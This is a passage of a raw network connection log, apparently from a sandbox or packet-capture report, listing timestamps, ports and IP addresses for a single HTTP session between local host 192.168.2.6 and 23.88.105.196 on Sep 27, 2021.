Sep 27, 2021 18:33:09.107182980 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107204914 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107229948 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107247114 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107260942 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.107295990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107326984 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.107352018 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.107445955 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107471943 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107506037 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107506990 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.107557058 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.107700109 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107722998 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107762098 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.107769012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107810974 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107815027 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.107836962 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107858896 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.107867956 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.107916117 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.107974052 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108014107 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108036995 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108047962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108078003 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108081102 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108108997 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108123064 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108134031 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108180046 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108185053 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108226061 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108294964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108321905 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108350992 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108383894 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108445883 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108454943 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108495951 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108613968 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108726978 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108736038 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108766079 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108789921 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108814955 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108861923 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108899117 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.108925104 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108953953 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.108971119 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109021902 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109050989 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109091997 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109103918 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109117985 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109141111 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109150887 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109167099 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109189034 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109237909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109256983 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109273911 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109292030 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109370947 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109383106 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109405041 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109431028 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109452963 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109463930 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109477997 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109498978 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109522104 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109545946 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109558105 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109597921 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109601021 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109625101 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109647036 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109669924 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109672070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109700918 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109702110 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109725952 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109729052 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109749079 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109771967 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109807014 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109849930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109927893 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.109941959 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109965086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109987974 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.109997034 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110011101 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110033035 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110060930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110073090 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110080004 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110090971 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110104084 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110131025 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110131979 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110155106 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110174894 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110181093 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110208988 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110209942 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110224009 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110235929 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110243082 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110265970 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110277891 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110291958 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110306025 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110315084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110337973 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110340118 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110363007 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110382080 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110385895 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110411882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110414028 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110455990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110456944 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110480070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110493898 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110502958 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110526085 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110533953 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110563040 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110584021 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110654116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110676050 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110677004 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110701084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110703945 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110723972 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110733032 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110749006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110769987 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110774994 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110822916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110846043 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110861063 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110876083 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110913992 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.110945940 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110972881 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.110996008 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111017942 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111017942 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111036062 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111041069 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111063957 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111088037 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111090899 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111110926 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111129999 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111155987 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111166954 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111181974 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111202955 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111203909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111227036 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111248016 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111249924 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111273050 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111293077 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111298084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111318111 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111323118 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111346960 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111366987 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111371994 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111390114 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111390114 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111411095 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111414909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111437082 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111462116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111475945 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111481905 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111486912 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111510038 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111525059 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111531973 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111555099 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111557007 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111577034 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111598969 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111603022 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111622095 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111634970 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111648083 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111670971 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111680031 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111694098 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111716032 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111718893 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111738920 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111746073 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111762047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111784935 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111787081 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111807108 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111833096 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111835003 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111860037 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111862898 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111882925 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111906052 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111907005 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111929893 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111943960 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111954927 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.111974955 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.111979961 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112004995 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112010956 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112031937 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112046003 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112056017 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112081051 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112082958 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112106085 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112119913 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112128973 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112152100 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112154007 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112174034 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112199068 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112199068 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112226009 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112227917 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112250090 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112267971 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112273932 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112297058 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112309933 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112318993 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112338066 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112343073 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112368107 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112371922 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112390995 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112406015 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112415075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112440109 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112448931 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112462044 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112484932 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112489939 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112509966 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112528086 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112531900 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112555027 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112556934 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112581015 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112596035 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112606049 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112629890 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112632990 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112652063 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112673998 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112673998 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112698078 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112715960 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112720013 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112742901 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112745047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112768888 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112785101 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112792969 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112828970 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112831116 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112833977 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112854004 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112870932 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112884998 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112896919 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112910986 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112931967 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112936974 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112957001 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.112977028 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.112979889 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113003969 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113028049 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113034010 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113053083 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113078117 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113078117 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113101006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113101959 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113126040 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113147020 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113151073 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113168955 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113192081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113194942 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113217115 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113236904 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113240957 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113264084 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113267899 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113281012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113305092 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113307953 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113329887 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113343954 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113353014 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113375902 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113385916 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113398075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113420010 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113435030 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113440990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113465071 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113478899 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113487005 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113511086 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113512993 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113538027 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113545895 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113559008 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113575935 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113584995 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113609076 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.113626003 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.113631010 CEST	80	49741	23.88.105.196	192.168.2.6
